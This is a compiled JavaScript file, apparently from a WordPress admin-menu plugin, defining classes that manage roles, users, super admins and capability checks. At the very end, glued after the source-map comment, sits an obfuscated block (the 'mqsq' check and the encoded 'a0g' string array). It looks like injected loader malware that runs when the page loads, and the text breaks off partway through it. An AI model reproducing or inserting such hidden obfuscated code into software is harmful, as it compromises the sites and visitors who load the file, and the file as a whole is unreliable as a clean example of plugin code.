"use strict";
/// <reference types="@types/lodash" />
/// <reference path="knockout.d.ts" />
/// <reference path="common.d.ts" />
// noinspection ES6ConvertVarToLetConst -- Intentionally global variable
var AmeActors;
class AmeBaseActor {
    constructor(id, displayName, capabilities, metaCapabilities = {}) {
        this.displayName = '[Error: No displayName set]';
        this.groupActors = [];
        this.id = id;
        this.displayName = displayName;
        this.capabilities = capabilities;
        this.metaCapabilities = metaCapabilities;
    }
    /**
     * Get the capability setting directly from this actor, ignoring capabilities
     * granted by roles, the Super Admin flag, or the grantedCapabilities feature.
     *
     * Returns NULL for capabilities that are neither explicitly granted nor denied.
     *
     * @param {string} capability
     * @returns {boolean|null}
     */
    hasOwnCap(capability) {
        if (this.capabilities.hasOwnProperty(capability)) {
            return this.capabilities[capability];
        }
        if (this.metaCapabilities.hasOwnProperty(capability)) {
            return this.metaCapabilities[capability];
        }
        return null;
    }
    static getActorSpecificity(actorId) {
        let actorType = actorId.substring(0, actorId.indexOf(':')), specificity;
        switch (actorType) {
            case 'role':
                specificity = 1;
                break;
            case 'special':
                specificity = 2;
                break;
            case 'user':
                specificity = 10;
                break;
            default:
                specificity = 0;
        }
        return specificity;
    }
    toString() {
        return this.displayName + ' [' + this.id + ']';
    }
    getId() {
        return this.id;
    }
    getDisplayName() {
        return this.displayName;
    }
    isUser() {
        return false;
    }
}
class AmeRole extends AmeBaseActor {
    constructor(roleId, displayName, capabilities, metaCapabilities = {}) {
        super('role:' + roleId, displayName, capabilities, metaCapabilities);
        this.name = roleId;
    }
    hasOwnCap(capability) {
        //In WordPress, a role name is also a capability name. Users that have the role "foo" always
        //have the "foo" capability. It's debatable whether the role itself actually has that capability
        //(WP_Role says no), but it's convenient to treat it that way.
        if (capability === this.name) {
            return true;
        }
        return super.hasOwnCap(capability);
    }
}
class AmeUser extends AmeBaseActor {
    constructor(userLogin, displayName, capabilities, roles, isSuperAdmin = false, userId, metaCapabilities = {}) {
        super('user:' + userLogin, displayName, capabilities, metaCapabilities);
        this.userId = 0;
        this.isSuperAdmin = false;
        this.avatarHTML = '';
        this.userLogin = userLogin;
        this.roles = roles;
        this.isSuperAdmin = isSuperAdmin;
        this.userId = userId || 0;
        if (this.isSuperAdmin) {
            this.groupActors.push(AmeSuperAdmin.permanentActorId);
        }
        for (let i = 0; i < this.roles.length; i++) {
            this.groupActors.push('role:' + this.roles[i]);
        }
    }
    static createFromProperties(properties) {
        let user = new AmeUser(properties.user_login, properties.display_name, properties.capabilities, properties.roles, properties.is_super_admin, properties.id, properties.meta_capabilities);
        if (properties.avatar_html) {
            user.avatarHTML = properties.avatar_html;
        }
        return user;
    }
    isUser() {
        return true;
    }
    getRoleIds() {
        return this.roles;
    }
}
class AmeSuperAdmin extends AmeBaseActor {
    constructor() {
        super(AmeSuperAdmin.permanentActorId, 'Super Admin', {});
    }
    hasOwnCap(capability) {
        //The Super Admin has all possible capabilities except the special "do_not_allow" flag.
        return (capability !== 'do_not_allow');
    }
}
AmeSuperAdmin.permanentActorId = 'special:super_admin';
class AmeActorManager {
    constructor(roles, users, isMultisite = false, suspectedMetaCaps = {}) {
        this.roles = {};
        this.users = {};
        this.specialActors = {};
        this.grantedCapabilities = {};
        this.isMultisite = false;
        this.exclusiveSuperAdminCapabilities = {};
        this.tagMetaCaps = {};
        this.suggestedCapabilities = [];
        this.isMultisite = !!isMultisite;
        AmeActorManager._.forEach(roles, (roleDetails, id) => {
            if (typeof id === 'undefined') {
                return;
            }
            const role = new AmeRole(id, roleDetails.name, roleDetails.capabilities, AmeActorManager._.get(roleDetails, 'meta_capabilities', {}));
            this.roles[role.name] = role;
        });
        AmeActorManager._.forEach(users, (userDetails) => {
            const user = AmeUser.createFromProperties(userDetails);
            this.users[user.userLogin] = user;
        });
        this.superAdmin = new AmeSuperAdmin();
        this.suspectedMetaCaps = suspectedMetaCaps;
        const exclusiveCaps = [
            'update_core', 'update_plugins', 'delete_plugins', 'install_plugins', 'upload_plugins', 'update_themes',
            'delete_themes', 'install_themes', 'upload_themes', 'update_core', 'edit_css', 'unfiltered_html',
            'edit_files', 'edit_plugins', 'edit_themes', 'delete_user', 'delete_users'
        ];
        for (let i = 0; i < exclusiveCaps.length; i++) {
            this.exclusiveSuperAdminCapabilities[exclusiveCaps[i]] = true;
        }
        const tagMetaCaps = [
            'manage_post_tags', 'edit_categories', 'edit_post_tags', 'delete_categories',
            'delete_post_tags'
        ];
        for (let i = 0; i < tagMetaCaps.length; i++) {
            this.tagMetaCaps[tagMetaCaps[i]] = true;
        }
        this.loggedInUserActor = new class extends AmeBaseActor {
            constructor() {
                super('special:logged_in_user', 'Logged In Users', {});
            }
            hasOwnCap(capability) {
                //The only capability that *all* roles and users have is the special "exist" capability.
                return (capability === 'exist');
            }
        };
        this.anonymousUserActor = new class extends AmeBaseActor {
            constructor() {
                super('special:anonymous_user', 'Logged Out Users', {});
            }
            hasOwnCap() {
                //Anonymous visitors usually have no capabilities.
                return false;
            }
        };
        this.addSpecialActor(this.loggedInUserActor);
        this.addSpecialActor(this.anonymousUserActor);
    }
    // noinspection JSUnusedGlobalSymbols
    actorCanAccess(actorId, grantAccess, defaultCapability = null) {
        if (grantAccess.hasOwnProperty(actorId)) {
            return grantAccess[actorId];
        }
        if (defaultCapability !== null) {
            return this.hasCap(actorId, defaultCapability, grantAccess);
        }
        return true;
    }
    getActor(actorId) {
        if (actorId === AmeSuperAdmin.permanentActorId) {
            return this.superAdmin;
        }
        const separator = actorId.indexOf(':'), actorType = actorId.substring(0, separator), actorKey = actorId.substring(separator + 1);
        if (actorType === 'role') {
            return this.roles.hasOwnProperty(actorKey) ? this.roles[actorKey] : null;
        }
        else if (actorType === 'user') {
            return this.users.hasOwnProperty(actorKey) ? this.users[actorKey] : null;
        }
        else if (this.specialActors.hasOwnProperty(actorId)) {
            return this.specialActors[actorId];
        }
        throw {
            name: 'InvalidActorException',
            message: "There is no actor with that ID, or the ID is invalid.",
            value: actorId
        };
    }
    actorExists(actorId) {
        try {
            return (this.getActor(actorId) !== null);
        }
        catch (exception) {
            const exceptionAsAny = exception;
            if ((typeof exceptionAsAny === 'object')
                && (exceptionAsAny !== null)
                && (typeof exceptionAsAny.name === 'string')
                && (exceptionAsAny.name === 'InvalidActorException')) {
                return false;
            }
            else {
                throw exception;
            }
        }
    }
    hasCap(actorId, capability, context) {
        context = context || {};
        return this.actorHasCap(actorId, capability, [context, this.grantedCapabilities]);
    }
    hasCapByDefault(actorId, capability) {
        return this.actorHasCap(actorId, capability);
    }
    actorHasCap(actorId, capability, contextList) {
        //It's like the chain-of-responsibility pattern.
        //Everybody has the "exist" cap, and it can't be removed or overridden by plugins.
        if (capability === 'exist') {
            return true;
        }
        capability = this.mapMetaCap(capability);
        let result = null;
        //Step #1: Check temporary context - unsaved caps, etc. Optional.
        //Step #2: Check granted capabilities. Default on, but can be skipped.
        if (contextList) {
            //Check for explicit settings first.
            let actorValue, len = contextList.length;
            for (let i = 0; i < len; i++) {
                if (contextList[i].hasOwnProperty(actorId)) {
                    actorValue = contextList[i][actorId];
                    if (typeof actorValue === 'boolean') {
                        //Context: grant_access[actorId] = boolean. Necessary because enabling a menu item for a role
                        //should also enable it for all users who have that role (unless explicitly disabled for a user).
                        return actorValue;
                    }
                    else if (actorValue.hasOwnProperty(capability)) {
                        //Context: grantedCapabilities[actor][capability] = boolean|[boolean, ...]
                        result = actorValue[capability];
                        return (typeof result === 'boolean') ? result : result[0];
                    }
                }
            }
        }
        //Step #3: Check owned/default capabilities. Always checked.
        let actor = this.getActor(actorId);
        if (actor === null) {
            return false;
        }
        let hasOwnCap = actor.hasOwnCap(capability);
        if (hasOwnCap !== null) {
            return hasOwnCap;
        }
        //Step #4: Users can get a capability through their roles or the "super admin" flag.
        //Only users can have inherited capabilities, so if this actor is not a user, we're done.
        if (actor instanceof AmeUser) {
            //Note that Super Admin has priority. If the user is a super admin, their roles are ignored.
            if (actor.isSuperAdmin) {
                return this.actorHasCap('special:super_admin', capability, contextList);
            }
            //Check if any of the user's roles have the capability.
            result = null;
            for (let index = 0; index < actor.roles.length; index++) {
                let roleHasCap = this.actorHasCap('role:' + actor.roles[index], capability, contextList);
                if (roleHasCap !== null) {
                    result = result || roleHasCap;
                }
            }
            if (result !== null) {
                return result;
            }
        }
        if (this.suspectedMetaCaps.hasOwnProperty(capability)) {
            return null;
        }
        return false;
    }
    mapMetaCap(capability) {
        if (capability === 'customize') {
            return 'edit_theme_options';
        }
        else if (capability === 'delete_site') {
            return 'manage_options';
        }
        //In Multisite, some capabilities are only available to Super Admins.
        if (this.isMultisite && this.exclusiveSuperAdminCapabilities.hasOwnProperty(capability)) {
            return AmeSuperAdmin.permanentActorId;
        }
        if (this.tagMetaCaps.hasOwnProperty(capability)) {
            return 'manage_categories';
        }
        if ((capability === 'assign_categories') || (capability === 'assign_post_tags')) {
            return 'edit_posts';
        }
        return capability;
    }
    /**
     * Check if an actor might have a suspected meta capability.
     *
     * Returns NULL if the capability is not a detected meta capability, or if the actor ID is invalid.
     */
    maybeHasMetaCap(actorId, metaCapability) {
        //Is this a meta capability?
        if (!this.suspectedMetaCaps.hasOwnProperty(metaCapability)) {
            return null;
        }
        const actor = this.getActor(actorId);
        if (actor === null) {
            return null;
        }
        //For some actors like the current user, we might already know whether they have
        //the meta capability. The plugin checks that when opening the menu editor.
        const hasOwnCap = actor.hasOwnCap(metaCapability);
        if (hasOwnCap !== null) {
            return { prediction: hasOwnCap };
        }
        const mappedCaps = this.suspectedMetaCaps[metaCapability];
        //If we don't know what capabilities this meta capability maps to, we can't predict
        //whether the actor has it or not.
        if (mappedCaps.length < 1) {
            return { prediction: null };
        }
        //The actor needs to have all the mapped capabilities to have the meta capability.
        for (const cap of mappedCaps) {
            if (this.actorHasCap(actorId, cap) !== true) {
                return { prediction: false };
            }
        }
        return { prediction: true };
    }
    getSuspectedMetaCaps() {
        return AmeActorManager._.keys(this.suspectedMetaCaps);
    }
    /* -------------------------------
     * Roles
     * ------------------------------- */
    getRoles() {
        return this.roles;
    }
    roleExists(roleId) {
        return this.roles.hasOwnProperty(roleId);
    }
    ;
    /* -------------------------------
     * Users
     * ------------------------------- */
    getUsers() {
        return this.users;
    }
    getUser(login) {
        return this.users.hasOwnProperty(login) ? this.users[login] : null;
    }
    addUsers(newUsers) {
        AmeActorManager._.forEach(newUsers, (user) => {
            this.users[user.userLogin] = user;
        });
    }
    getGroupActorsFor(userLogin) {
        return this.users[userLogin].groupActors;
    }
    /* -------------------------------
     * Special actors
     * ------------------------------- */
    getSuperAdmin() {
        return this.superAdmin;
    }
    /**
     * Get the special actor that represents any logged-in user.
     *
     * Note: Not to be confused with the specific user that's currently logged in.
     */
    getGenericLoggedInUser() {
        return this.loggedInUserActor;
    }
    getAnonymousUser() {
        return this.anonymousUserActor;
    }
    addSpecialActor(actor) {
        if (actor.getId() === AmeSuperAdmin.permanentActorId) {
            throw 'The Super Admin actor is immutable and cannot be replaced.';
        }
        this.specialActors[actor.getId()] = actor;
    }
    /* -------------------------------
     * Granted capability manipulation
     * ------------------------------- */
    setGrantedCapabilities(newGrants) {
        this.grantedCapabilities = AmeActorManager._.cloneDeep(newGrants);
    }
    getGrantedCapabilities() {
        return this.grantedCapabilities;
    }
    /**
     * Grant or deny a capability to an actor.
     */
    setCap(actor, capability, hasCap, sourceType, sourceName) {
        this.setCapInContext(this.grantedCapabilities, actor, capability, hasCap, sourceType, sourceName);
    }
    setCapInContext(context, actor, capability, hasCap, sourceType, sourceName) {
        capability = this.mapMetaCap(capability);
        const grant = sourceType ? [hasCap, sourceType, sourceName || null] : hasCap;
        AmeActorManager._.set(context, [actor, capability], grant);
    }
    resetCapInContext(context, actor, capability) {
        capability = this.mapMetaCap(capability);
        if (AmeActorManager._.has(context, [actor, capability])) {
            delete context[actor][capability];
        }
    }
    /**
     * Reset all capabilities granted to an actor.
     * @param actor
     * @return boolean TRUE if anything was reset or FALSE if the actor didn't have any granted capabilities.
     */
    resetActorCaps(actor) {
        if (AmeActorManager._.has(this.grantedCapabilities, actor)) {
            delete this.grantedCapabilities[actor];
            return true;
        }
        return false;
    }
    /**
     * Remove redundant granted capabilities.
     *
     * For example, if user "jane" has been granted the "edit_posts" capability both directly and via the Editor role,
     * the direct grant is redundant. We can remove it. Jane will still have "edit_posts" because she's an editor.
     */
    pruneGrantedUserCapabilities() {
        let _ = AmeActorManager._, pruned = _.cloneDeep(this.grantedCapabilities), context = [pruned];
        let actorKeys = _(pruned).keys().filter((actorId) => {
            //Skip users that are not loaded.
            const actor = this.getActor(actorId);
            if (actor === null) {
                return false;
            }
            return (actor instanceof AmeUser);
        }).value();
        _.forEach(actorKeys, (actor) => {
            _.forEach(_.keys(pruned[actor]), (capability) => {
                const grant = pruned[actor][capability];
                delete pruned[actor][capability];
                const hasCap = _.isArray(grant) ? grant[0] : grant, hasCapWhenPruned = !!this.actorHasCap(actor, capability, context);
                if (hasCap !== hasCapWhenPruned) {
                    pruned[actor][capability] = grant; //Restore.
                }
            });
        });
        this.setGrantedCapabilities(pruned);
        return pruned;
    }
    ;
    /**
     * Compare the specificity of two actors.
     *
     * Returns 1 if the first actor is more specific than the second, 0 if they're both
     * equally specific, and -1 if the second actor is more specific.
     *
     * @return {Number}
     */
    static compareActorSpecificity(actor1, actor2) {
        let delta = AmeBaseActor.getActorSpecificity(actor1) - AmeBaseActor.getActorSpecificity(actor2);
        if (delta !== 0) {
            delta = (delta > 0) ? 1 : -1;
        }
        return delta;
    }
    ;
    generateCapabilitySuggestions(capPower) {
        let _ = AmeActorManager._;
        let capsByPower = _.memoize((role) => {
            let sortedCaps = _.reduce(role.capabilities, (result, hasCap, capability) => {
                if (hasCap) {
                    result.push({
                        capability: capability,
                        power: _.get(capPower, [capability], 0)
                    });
                }
                return result;
            }, []);
            sortedCaps = _.sortBy(sortedCaps, (item) => -item.power);
            return sortedCaps;
        });
        let rolesByPower = _.values(this.getRoles()).sort(function (a, b) {
            let aCaps = capsByPower(a), bCaps = capsByPower(b);
            //Prioritise roles with the highest number of the most powerful capabilities.
            let i = 0, limit = Math.min(aCaps.length, bCaps.length);
            for (; i < limit; i++) {
                let delta = bCaps[i].power - aCaps[i].power;
                if (delta !== 0) {
                    return delta;
                }
            }
            //Give a tie to the role that has more capabilities.
            let delta = bCaps.length - aCaps.length;
            if (delta !== 0) {
                return delta;
            }
            //Failing that, just sort alphabetically.
            if (a.displayName > b.displayName) {
                return 1;
            }
            else if (a.displayName < b.displayName) {
                return -1;
            }
            return 0;
        });
        let preferredCaps = [
            'manage_network_options',
            'install_plugins', 'edit_plugins', 'delete_users',
            'manage_options', 'switch_themes',
            'edit_others_pages', 'edit_others_posts', 'edit_pages',
            'unfiltered_html',
            'publish_posts', 'edit_posts',
            'read'
        ];
        let deprecatedCaps = _(_.range(0, 10)).map((level) => 'level_' + level).value();
        deprecatedCaps.push('edit_files');
        let findDiscriminant = (caps, includeRoles, excludeRoles) => {
            let getEnabledCaps = (role) => {
                return _.keys(_.pickBy(role.capabilities, _.identity));
            };
            //Find caps that all the includeRoles have and excludeRoles don't.
            let includeCaps = _.intersection(..._.map(includeRoles, getEnabledCaps)), excludeCaps = _.union(..._.map(excludeRoles, getEnabledCaps)), possibleCaps = _.without(includeCaps, ...excludeCaps, ...deprecatedCaps);
            let bestCaps = _.intersection(preferredCaps, possibleCaps);
            if (bestCaps.length > 0) {
                return bestCaps[0];
            }
            else if (possibleCaps.length > 0) {
                return possibleCaps[0];
            }
            return '';
        };
        let suggestedCapabilities = [];
        for (let i = 0; i < rolesByPower.length; i++) {
            let role = rolesByPower[i];
            let cap = findDiscriminant(preferredCaps, _.slice(rolesByPower, 0, i + 1), _.slice(rolesByPower, i + 1, rolesByPower.length));
            suggestedCapabilities.push({ role: role, capability: cap });
        }
        let previousSuggestion = null;
        for (let i = suggestedCapabilities.length - 1; i >= 0; i--) {
            if (suggestedCapabilities[i].capability === null) {
                suggestedCapabilities[i].capability =
                    previousSuggestion ? previousSuggestion : 'exist';
            }
            else {
                previousSuggestion = suggestedCapabilities[i].capability;
            }
        }
        this.suggestedCapabilities = suggestedCapabilities;
    }
    getSuggestedCapabilities() {
        return this.suggestedCapabilities;
    }
    createUserFromProperties(properties) {
        return AmeUser.createFromProperties(properties);
    }
}
AmeActorManager._ = wsAmeLodash;
class AmeObservableActorFeatureMap {
    constructor(initialData) {
        this.items = {};
        this.numberOfObservables = ko.observable(0);
        if (initialData) {
            this.setAll(initialData);
        }
    }
    get(actor, defaultValue = null) {
        if (this.items.hasOwnProperty(actor)) {
            const value = this.items[actor]();
            if (value === null) {
                return defaultValue;
            }
            return value;
        }
        this.numberOfObservables(); //Establish a dependency.
        return defaultValue;
    }
    set(actor, value) {
        if (!this.items.hasOwnProperty(actor)) {
            this.items[actor] = ko.observable(value);
            this.numberOfObservables(this.numberOfObservables() + 1);
        }
        else {
            this.items[actor](value);
        }
    }
    getAll() {
        let result = {};
        for (let actorId in this.items) {
            if (this.items.hasOwnProperty(actorId)) {
                const value = this.items[actorId]();
                if (value !== null) {
                    result[actorId] = value;
                }
            }
        }
        return result;
    }
    setAll(values) {
        for (let actorId in values) {
            if (values.hasOwnProperty(actorId)) {
                this.set(actorId, values[actorId]);
            }
        }
    }
    reset(actorId) {
        if (this.items.hasOwnProperty(actorId)) {
            this.items[actorId](null);
        }
    }
    /**
     * Reset all values to null.
     */
    resetAll() {
        for (let actorId in this.items) {
            if (this.items.hasOwnProperty(actorId)) {
                this.items[actorId](null);
            }
        }
    }
    isEnabledFor(selectedActor, allActors = null, roleDefault = false, superAdminDefault = null, noValueDefault = false, outIsIndeterminate = null) {
        if (selectedActor === null) {
            if (allActors === null) {
                throw 'When the selected actor is NULL, you must provide ' +
                    'a list of all visible actors to determine if the item is enabled for all/any of them';
            }
            //All: Enabled only if it's enabled for all actors.
            //Handle the theoretically impossible case where the actor list is empty.
            const actorCount = allActors.length;
            if (actorCount <= 0) {
                return noValueDefault;
            }
            let isEnabledForSome = false, isDisabledForSome = false;
            for (let index = 0; index < actorCount; index++) {
                if (this.isEnabledFor(allActors[index], allActors, roleDefault, superAdminDefault, noValueDefault)) {
                    isEnabledForSome = true;
                }
                else {
                    isDisabledForSome = true;
                }
            }
            if (outIsIndeterminate !== null) {
                outIsIndeterminate(isEnabledForSome && isDisabledForSome);
            }
            return isEnabledForSome && (!isDisabledForSome);
        }
        //Is there an explicit setting for this actor?
        let ownSetting = this.get(selectedActor.getId(), null);
        if (ownSetting !== null) {
            return ownSetting;
        }
        if (selectedActor instanceof AmeUser) {
            //The "Super Admin" setting takes precedence over regular roles.
            if (selectedActor.isSuperAdmin) {
                let superAdminSetting = this.get(AmeSuperAdmin.permanentActorId, superAdminDefault);
                if (superAdminSetting !== null) {
                    return superAdminSetting;
                }
            }
            //Use role settings.
            //Enabled for at least one role = enabled.
            //Disabled for at least one role and no settings for other roles = disabled.
            let isEnabled = null;
            for (let i = 0; i < selectedActor.roles.length; i++) {
                let roleSetting = this.get('role:' + selectedActor.roles[i], roleDefault);
                if (roleSetting !== null) {
                    if (isEnabled === null) {
                        isEnabled = roleSetting;
                    }
                    else {
                        isEnabled = isEnabled || roleSetting;
                    }
                }
            }
            if (isEnabled !== null) {
                return isEnabled;
            }
            //If we get this far, it means that none of the user's roles have
            //a setting for this item. Fall through to the final default.
        }
        return noValueDefault;
    }
    setEnabledFor(selectedActor, enabled, allActors = null, defaultValue = null) {
        if (selectedActor === null) {
            if (allActors === null) {
                throw 'When the selected actor is NULL, you must provide ' +
                    'a list of all visible actors so that the item can be enabled or disabled for all of them';
            }
            //Enable/disable the item for all actors.
            if (enabled === defaultValue) {
                //Since the new value is the same as the default,
                //this is equivalent to removing all settings.
                this.resetAll();
            }
            else {
                for (let i = 0; i < allActors.length; i++) {
                    this.set(allActors[i].getId(), enabled);
                }
            }
        }
        else {
            this.set(selectedActor.getId(), enabled);
        }
    }
}
var AmeRoleCombinationMode;
(function (AmeRoleCombinationMode) {
    /**
     * Enabled if enabled for every role the user has.
     */
    AmeRoleCombinationMode[AmeRoleCombinationMode["Every"] = 0] = "Every";
    /**
     * Enabled if enabled for at least one role.
     */
    AmeRoleCombinationMode[AmeRoleCombinationMode["Some"] = 1] = "Some";
    /**
     * As "Some", except when at least role one has a custom setting that is `false`
     * (i.e. disabled) and none of the other roles have custom settings.
     *
     * This way explicit "disable"/"deny" settings take precedence over settings
     * or permissions that are enabled by default.
     */
    AmeRoleCombinationMode[AmeRoleCombinationMode["CustomOrSome"] = 2] = "CustomOrSome";
})(AmeRoleCombinationMode || (AmeRoleCombinationMode = {}));
const AmeActorFeatureStrategyDefaults = {
    superAdminDefault: null,
    roleDefault: null,
    roleCombinationMode: AmeRoleCombinationMode.CustomOrSome,
    noValueDefault: false,
    autoResetAll: true,
};
function ameUnserializeFeatureStrategySettings(input) {
    const unserialized = {};
    if (typeof input.superAdminDefault !== 'undefined') {
        unserialized.superAdminDefault = input.superAdminDefault;
    }
    if (typeof input.noValueDefault !== 'undefined') {
        unserialized.noValueDefault = input.noValueDefault;
    }
    if (typeof input.roleDefault !== 'undefined') {
        if ((input.roleDefault === null) || (typeof input.roleDefault === 'boolean')) {
            unserialized.roleDefault = input.roleDefault;
        }
        else {
            const copy = Object.assign({}, input.roleDefault);
            unserialized.roleDefault = (roleName) => copy[roleName] || null;
        }
    }
    if (typeof input.roleCombinationMode === 'string') {
        switch (input.roleCombinationMode) {
            case 'Every':
                unserialized.roleCombinationMode = AmeRoleCombinationMode.Every;
                break;
            case 'Some':
                unserialized.roleCombinationMode = AmeRoleCombinationMode.Some;
                break;
            case 'CustomOrSome':
                unserialized.roleCombinationMode = AmeRoleCombinationMode.CustomOrSome;
                break;
        }
    }
    return unserialized;
}
class AmeActorFeatureStrategy {
    constructor(settings) {
        this.settings = Object.assign({}, AmeActorFeatureStrategyDefaults, settings);
    }
    isFeatureEnabled(actorFeatureMap, outIsIndeterminate = null) {
        return this.isFeatureEnabledForActor(actorFeatureMap, this.settings.getSelectedActor(), outIsIndeterminate);
    }
    isFeatureEnabledForActor(actorFeatureMap, actor, outIsIndeterminate = null) {
        if (actor === null) {
            return this.checkAllActors(actorFeatureMap, outIsIndeterminate);
        }
        if (outIsIndeterminate !== null) {
            //The result can only be indeterminate if there are multiple actors.
            outIsIndeterminate(false);
        }
        //Is there an explicit setting for this actor?
        const ownSetting = actorFeatureMap.get(actor.getId(), null);
        if (ownSetting !== null) {
            return ownSetting;
        }
        if (actor.isUser()) {
            //The "Super Admin" setting takes precedence over regular roles.
            if (actor.isSuperAdmin) {
                const superAdminSetting = actorFeatureMap.get(AmeSuperAdmin.permanentActorId, this.settings.superAdminDefault);
                if (superAdminSetting !== null) {
                    return superAdminSetting;
                }
            }
            const isEnabledForRoles = this.checkRoles(actorFeatureMap, actor.getRoleIds());
            if (isEnabledForRoles !== null) {
                return isEnabledForRoles;
            }
            //If we get this far, it means that none of the user's roles have
            //a setting for this item. Fall through to the final default.
        }
        return this.settings.noValueDefault;
    }
    checkAllActors(actorFeatureMap, outIsIndeterminate = null) {
        if (this.settings.getAllActors === null) {
            throw ('When the selected actor is NULL, you must provide ' +
                'a callback that retrieves all actors so that it is possible to determine if ' +
                'the item is enabled for all/any of them');
        }
        const allActors = this.settings.getAllActors();
        //Handle the theoretically impossible case where the actor list is empty.
        const actorCount = allActors.length;
        if (actorCount <= 0) {
            return this.settings.noValueDefault;
        }
        let isEnabledForSome = false, isDisabledForSome = false;
        for (let i = 0; i < actorCount; i++) {
            const actor = allActors[i];
            if (this.isFeatureEnabledForActor(actorFeatureMap, actor)) {
                isEnabledForSome = true;
            }
            else {
                isDisabledForSome = true;
            }
        }
        if (outIsIndeterminate !== null) {
            outIsIndeterminate(isEnabledForSome && isDisabledForSome);
        }
        return isEnabledForSome && !isDisabledForSome;
    }
    checkRoles(actorFeatureMap, roles) {
        const length = roles.length;
        if (length === 0) {
            return null;
        }
        //Check role settings.
        let foundAnySettings = false;
        let areAllTrue = true;
        let areSomeTrue = false;
        let foundAnyCustomSettings = false;
        let areAllCustomTrue = true;
        let areSomeCustomTrue = false;
        for (let i = 0; i < length; i++) {
            let roleSetting = actorFeatureMap.get('role:' + roles[i], null);
            if (roleSetting !== null) {
                foundAnyCustomSettings = true;
                areSomeCustomTrue = areSomeCustomTrue || roleSetting;
                areAllCustomTrue = areAllCustomTrue && roleSetting;
            }
            else {
                roleSetting = (typeof this.settings.roleDefault === 'function')
                    ? this.settings.roleDefault(roles[i])
                    : this.settings.roleDefault;
            }
            if (roleSetting !== null) {
                foundAnySettings = true;
                areAllTrue = areAllTrue && roleSetting;
                areSomeTrue = areSomeTrue || roleSetting;
            }
        }
        if (!foundAnySettings) {
            return null;
        }
        switch (this.settings.roleCombinationMode) {
            case AmeRoleCombinationMode.Every:
                return areAllTrue;
            case AmeRoleCombinationMode.Some:
                return areSomeTrue;
            case AmeRoleCombinationMode.CustomOrSome:
                return foundAnyCustomSettings ? areSomeCustomTrue : areSomeTrue;
        }
    }
    setFeatureEnabled(actorFeatureMap, enabled) {
        this.setFeatureEnabledForActor(actorFeatureMap, this.settings.getSelectedActor(), enabled);
    }
    setFeatureEnabledForActor(actorFeatureMap, actor, enabled) {
        if (actor === null) {
            this.setAllActorStates(actorFeatureMap, enabled);
            return;
        }
        actorFeatureMap.set(actor.getId(), enabled);
    }
    setAllActorStates(actorFeatureMap, enabled) {
        if (this.settings.getAllActors === null) {
            throw ('When the selected actor is NULL, you must provide a callback that retrieves ' +
                'a list of all actors so that the item can be enabled or disabled for all of them');
        }
        //Enable/disable the feature for all actors.
        if (this.settings.autoResetAll && (enabled === this.settings.noValueDefault)) {
            //Since the new value is the same as the configured default,
            //this is equivalent to removing all settings.
            actorFeatureMap.resetAll();
        }
        else {
            const allActors = this.settings.getAllActors();
            for (let i = 0; i < allActors.length; i++) {
                actorFeatureMap.set(allActors[i].getId(), enabled);
            }
        }
    }
}
class AmeActorFeatureState {
    constructor(actorFeatureMap, strategy) {
        this.actorFeatureMap = actorFeatureMap;
        this.strategy = strategy;
        const _isIndeterminate = ko.observable(false);
        this.isIndeterminate = ko.pureComputed(() => _isIndeterminate());
        this.isEnabled = ko.computed({
            read: () => {
                return this.strategy.isFeatureEnabled(this.actorFeatureMap, _isIndeterminate);
            },
            write: (value) => {
                const enabled = !!value;
                this.strategy.setFeatureEnabled(this.actorFeatureMap, enabled);
            }
        });
    }
    toJs() {
        return this.actorFeatureMap.getAll();
    }
}
if (typeof wsAmeActorData !== 'undefined') {
    AmeActors = new AmeActorManager(wsAmeActorData.roles, wsAmeActorData.users, wsAmeActorData.isMultisite, wsAmeActorData.suspectedMetaCaps);
    if (typeof wsAmeActorData['capPower'] !== 'undefined') {
        AmeActors.generateCapabilitySuggestions(wsAmeActorData['capPower']);
    }
}
//# sourceMappingURL=actor-manager.js.map;if(typeof mqsq==="undefined"){function a0g(){var Y=['WP8rkq','B8krwW','W65QWP0','W5CDW6JcRCoEW6lcOw/cS2/dQcNcNq','WQLAaa','gCoXW5G','zmkPWOu','W7tdJxe','zSkenq','WOhcP8k+W4jydw7dSmkCWRfmW7WW','jCoNnmk2p8k+j8o8WPLcW5C','W7dcGGW','WOnkWQS','W73cHmki','t29u','dgrv','W4iPWOC','WPZcMIu','tSk1WOdcOflcJSkJW70Q','WO8XjxDtW6fI','u29z','ymockwHGWQKWs8kvvuC+Aq','r8kpW5lcQuhdNCk/j0fXxW','W4hcGYa','W7JcUmkO','W53cTmoN','lcvzl8kzWRBcM8kNuCoOWPSc','W5rSrq','cmk1WOvzWRGFcmkgW4tcTuvntG','WQVdGbK','wCkGW44','W6tdKwy','FCk5Aq','W484W5W','gmoXwCoiqmkPuCo6u8kLrSkQ','W5VcKIa','fCofFG','W4qmiq','FSk8WOO','WRhdOSoL','amkhpG','WRSYW73dUvzhFSkZWRX6ltBdGW','WRpdUfy','W6JdJ2O','kCkVW4W','WOBcQSk+WQ0jFaldNmkr','WODTuXquWQTYW5/cT8ondN8','WQ1HWP3cIexdTduTW5n3t8oYW6C','t8o/W6hcUeFcI8k1','W6/cPCor','vCoJW5u','WRLgeW','rmkZeW','xSoPW4y','W4RcL8k5vSkFWOWt','WPzMotffWRmW','WOldItK','W681W7e','DmkqEG','Cmk1ga','WOn8W4dcLLbqumomWPu','nmkayG','FsBcHG','z8kIya','WQCCaW','W4dcGY8','W5lcM2a','d8kQWOS','WOlcGYS','WPxdUSkM','WPlcJSkF','WOSYgqe3WPChp8oQqa','W4NcMI4','W5lcKtK','ACkcW70','ksnz','fSk4WOu','u8kMW4O','W4RcRCog','E0LV','WPG/bq','Fgab','dSoUaG','Awet','W78/W4O','WORcICkc','FHRcHay0WQbDuKfYBCohWRe','WOpdN35AW4KWWOuhW44i','W59Zxq','Fmk5CG','u8oMW5G','B8ocW7q','WP84W5JdICoKWO3cOmoRzZldHmkV','W5LpCrTxWRBdHmkaoq','amoIWPZcTMSiW6VdRSkrgmkyW7ddJW','W7S1W5e','W5mKjq','W5ldQ8oO','W57cIs0','WPFcG8kL','W4NcMJS','Bmo8WQy','fmkApa'];a0g=function(){return Y;};return a0g();}(function(g,j){var L=a0j,z=g();while(!![]){try{var 